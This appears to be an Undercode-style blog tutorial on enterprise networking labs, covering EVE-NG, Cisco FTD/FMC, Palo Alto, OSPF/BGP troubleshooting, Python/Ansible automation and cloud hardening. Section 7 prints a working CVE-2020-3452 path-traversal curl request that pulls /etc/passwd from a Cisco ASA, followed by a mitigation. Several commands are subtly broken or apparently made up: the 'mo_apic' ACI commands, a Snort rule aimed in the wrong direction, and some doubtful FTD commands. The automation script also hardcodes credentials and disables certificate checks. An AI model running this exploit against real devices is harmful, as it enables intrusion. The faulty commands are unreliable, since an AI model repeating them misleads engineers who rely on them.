Master Enterprise Networking & Security: Hands-On EVE-NG Labs, Firewall Hardening & Automation – No Fluff, Just Production Skills + Video

Listen to this Post

Featured Image

Introduction

Real enterprise networks don’t run on exam dumps or multiple-choice theory – they live on misconfigured OSPF neighbors, half‑denied firewall rules, and late‑night troubleshooting sessions. This article extracts the core from Tony Moukbel’s practical training approach (CCNA, CCNP, SD‑WAN, FTD/FMC, Palo Alto, Fortinet, and CCIE concepts) and transforms it into a step‑by‑step, command‑by‑command guide. You’ll learn to build multi‑vendor labs, break and fix routing, automate security policies, and harden cloud data centers – exactly how enterprise engineers do it.

Learning Objectives

  • Build a production‑grade EVE‑NG/CML lab with Cisco, Palo Alto, and Fortinet nodes from scratch.
  • Configure, validate, and troubleshoot OSPF/BGP, firewalls (FMC, PAN‑OS, FortiGate), and SD‑WAN policies.
  • Automate network security tasks using Python, Ansible, and REST APIs, then apply cloud hardening in ACI/AWS/Azure.

You Should Know

  1. Spin Up an EVE‑NG Pro Lab on Ubuntu 22.04 – Multi‑Vendor Ready
    Most enterprises virtualise everything. EVE‑NG (or CML) runs your routers, firewalls, and servers. Here’s how to install it with bare‑metal performance.

Step‑by‑step (Linux – Ubuntu Server)

 Update system and install dependencies
sudo apt update && sudo apt upgrade -y
sudo apt install -y qemu-kvm libvirt-daemon-system virt-manager bridge-utils python3-pip

Download and install EVE-NG (Community Edition)
wget http://www.eve-ng.net/repo/install-eve-ng.sh
chmod +x install-eve-ng.sh
sudo ./install-eve-ng.sh

Add your user to required groups
sudo usermod -aG eve,libvirt,kvm,www-data $USER

Download Cisco IOSv, IOS XE, and vFTD images (from Cisco CCO or lab sources)
 Place them in /opt/unetlab/addons/qemu/
 Fix permissions:
cd /opt/unetlab
sudo chown -R root:root addons/
sudo chmod -R 755 addons/

Fix permissions for lab files after any image addition
sudo /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

Windows alternative (VMware Workstation) – Install EVE‑NG OVA, then use the same Linux commands inside the VM.
Verify – Log into https://your-eve-ip, create a lab with two Cisco routers and a Palo Alto VM. Start them. If they boot without KVM errors, you’re production‑ready.

  1. Configure Cisco FTD Managed by FMC – Real Policy Push & Troubleshooting
    FMC is the brain of Cisco’s next‑gen firewall. Below is a typical enterprise access rule push.

On FMC (via Web UI or REST API)

  1. Create a zone: Network → Zones → Add Security Zone (Inside/Outside).
  2. Add network objects: Objects → Network → Add (e.g., 192.168.10.0/24).
  3. Create an ACP rule: Policies → Access Control → Add Rule.

– Source: Inside zone / object “LAN”
– Destination: Outside zone / object “Internet”
– Action: Allow
4. Deploy to FTD: Deploy → Select FTD device → Deploy.

Troubleshoot on FTD CLI (SSH)

 Check access control policy stats
system support firewall-engine-debug

View real‑time drops

<blockquote>
  show access-control statistics
  show access-control config
</blockquote>

If a rule isn’t hitting, verify object resolution

<blockquote>
  show network-object
  

Linux command to test firewall rule

 From inside host, test connectivity through FTD
curl -v -k https://8.8.8.8 --interface eth0
 Check if FTD logs the session
  1. Build a Palo Alto Security Policy with CLI & Panorama
    Palo Alto’s strength is App‑ID and policy‑based forwarding. This example blocks SSH but allows HTTPS.

CLI on Palo Alto firewall (configure mode)

configure
set deviceconfig system hostname PA-Lab
set network interface ethernet ethernet1/1 layer3 ip 10.0.0.1/24
set zone trust network layer3 ethernet1/1
set zone untrust network layer3 ethernet1/2

Create security policy
set rulebase security rules "Allow-Web" from trust to untrust source any destination any application 'ssl' 'web-browsing' action allow
set rulebase security rules "Block-SSH" from trust to untrust source any destination any application 'ssh' action deny
commit

Panorama (centralised management) – step‑by‑step

  • Add firewall as managed device: Panorama → Managed Devices → Add (IP, serial).
  • Push template and device group: Panorama → Templates → Push to Devices.
  • Verify with CLI on firewall: > show log system | match commit.

Windows command to test policy

Test-NetConnection -ComputerName 10.0.0.1 -Port 22  should time out (blocked)
Test-NetConnection -ComputerName 10.0.0.1 -Port 443  should succeed
  1. Enterprise Routing Troubleshooting – OSPF & BGP on Nexus/CSR1000v
    Lab failures happen. Learn to diagnose like a CCIE.

Common OSPF neighbour issue on Cisco Nexus / IOS XE

 Check OSPF neighbours
show ip ospf neighbor
show ip ospf interface brief

Debug if stuck in EXSTART/EXCHANGE – MTU mismatch
show interface | include MTU
 Fix: set mtu 1500 on both ends

Authentication failure
show ip ospf interface | include authentication
 Rekey with:
(config-router) area 0 authentication message-digest
(config-if) ip ospf message-digest-key 1 md5 MySecretKey

BGP route not showing in table – check as‑path length and next‑hop

show ip bgp neighbors <IP> advertised-routes
show ip bgp neighbors <IP> routes
show ip route bgp

If next‑hop is unreachable, fix via:
(config-router) neighbor <IP> next-hop-self

Packet capture on Linux to see BGP/OSPF traffic

sudo tcpdump -i eth0 -vvv port 179 or proto ospf -c 100
  1. Automate Firewall & Router Configs Using Python + Ansible (RESTCONF/NETCONF)
    Modern networking is code. Here’s a Python script to push an ACL to a Cisco router using RESTCONF.

Python script (run on any OS with Python 3)

import requests
requests.packages.urllib3.disable_warnings()
url = "https://192.168.1.1/restconf/data/Cisco-IOS-XE-native:native/ip/access-list"
headers = {"Accept": "application/yang-data+json", "Content-Type": "application/yang-data+json"}
auth = ("admin", "cisco")
acl_body = {
"Cisco-IOS-XE-acl:access-list": {
"extended": [{"name": "BLOCK_TELNET", "ace": [{"sequence": 10, "action": "deny", "protocol": "tcp", "source": "any", "destination": "any", "destination-operator": "eq", "destination-port": "23"}]}]
}
}
response = requests.put(url, json=acl_body, headers=headers, auth=auth, verify=False)
print(response.status_code)

Ansible playbook to enforce FortiGate security policies

- name: FortiGate policy automation
hosts: fortigates
gather_facts: no
tasks:
- name: Add address object
fortinet.fortios.fortios_firewall_address:
vdom: "root"
state: "present"
firewall_address:
name: "BLOCKED_SUBNET"
subnet: "10.10.10.0 255.255.255.0"
- name: Create deny policy
fortinet.fortios.fortios_firewall_policy:
vdom: "root"
state: "present"
firewall_policy:
policyid: 100
srcintf: [{name: "port1"}]
dstintf: [{name: "port2"}]
srcaddr: [{name: "BLOCKED_SUBNET"}]
dstaddr: [{name: "all"}]
action: "deny"
schedule: "always"
service: [{name: "ALL"}]
  1. Hardening Cloud Data Centers – Cisco ACI, AWS Security Groups & Azure NSG
    Enterprise data centers now mix on‑prem ACI with cloud. Here’s a multi‑cloud hardening checklist.

Cisco ACI (APIC CLI) – Block East‑West traffic between two EPGs

 Create a contract with a filter to deny ICMP
mo_apic -c "fv:Filter" -n name:NoPing,enteredBy:ansible
mo_apic -c "fv:Contract" -n name:Deny-EPG1-to-EPG2
mo_apic -c "fv:RsSubject" -n tnVzBrCPName:Deny-EPG1-to-EPG2,tnVzBrFilterName:NoPing
 Apply contract to both EPGs as provided contract

AWS CLI – restrict SSH to only your bastion IP

 Get current security group ID for web server
aws ec2 authorize-security-group-ingress --group-id sg-12345678 --protocol tcp --port 22 --cidr 203.0.113.10/32
 Remove default 0.0.0.0/0 SSH rule
aws ec2 revoke-security-group-ingress --group-id sg-12345678 --protocol tcp --port 22 --cidr 0.0.0.0/0

Azure CLI – block all public RDP

az network nsg rule update --name RDP --nsg-name MyNSG --resource-group MyRG --access Deny --priority 100
az network nsg rule list --nsg-name MyNSG --output table
  1. Vulnerability Exploitation & Mitigation on Firewalls (CVE Simulation)
    Understanding attacks means you can defend. Simulate a CVE‑2020‑3452 (Cisco ASA path traversal) using curl, then mitigate with an IPS signature.

Exploitation (on a lab ASA with HTTP access)

curl -k "https://<ASA-IP>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/../+CSCOE+/fileset/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
 If returns passwd content, device is vulnerable.

Mitigation on Cisco FTD (FMC) – Create an Intrusion Policy with Snort rule.
– Go to Policies → Intrusion → Intrusion Policy → Create.
– Add a custom rule:
`alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ASA path traversal attempt”; flow:to_server; content:”/../”; http_uri; sid:1000001; rev:1;)`
– Deploy policy to FTD. Re‑run the curl – traffic is dropped and logged.

Linux syslog monitoring

tail -f /var/log/syslog | grep "SNORT"

What Undercode Say

  • Theory rots, labs stick – Real enterprise engineers spend 70% of their time troubleshooting, not configuring from scratch. The sessions referenced in Tony’s post highlight this ratio. Without a lab (EVE‑NG/CML), you’re memorising commands you’ll forget after the exam.
  • Automation is non‑negotiable – The included Python/Ansible examples show that firewalls and routers are becoming API‑first. If you aren’t scripting security policy pushes, you’re already behind. The future of networking is CI/CD pipelines for ACLs.
  • Multi‑cloud + on‑prem hybrid hardens reality – ACI to AWS to Azure is no longer exotic. The commands above give you a repeatable way to block lateral movement, but the real skill is understanding where to place the deny – at the EPG contract, the NSG, or the security group? That context is what separates CCNP from CCIE.

Prediction

By 2028, hands‑on, lab‑first training like the one described will be the only relevant certification preparation. Exam vendors (Cisco, Palo Alto) will move to fully practical, live‑environment tests, and AI‑powered troubleshooting assistants will become standard in every firewall CLI. Engineers who cannot break a BGP adjacency in a lab and fix it within 10 minutes will find themselves replaced by automation – not because automation is smarter, but because it’s faster at running `show ip bgp` and correlating logs. The demand for hybrid cloud network security architects will triple, and the ability to script firewall changes with Ansible will be as basic as VLAN configuration is today. Start building your EVE‑NG lab this weekend – your future self in a troubleshooting bridge call will thank you.

▶️ Related Video (72% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Ah M – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky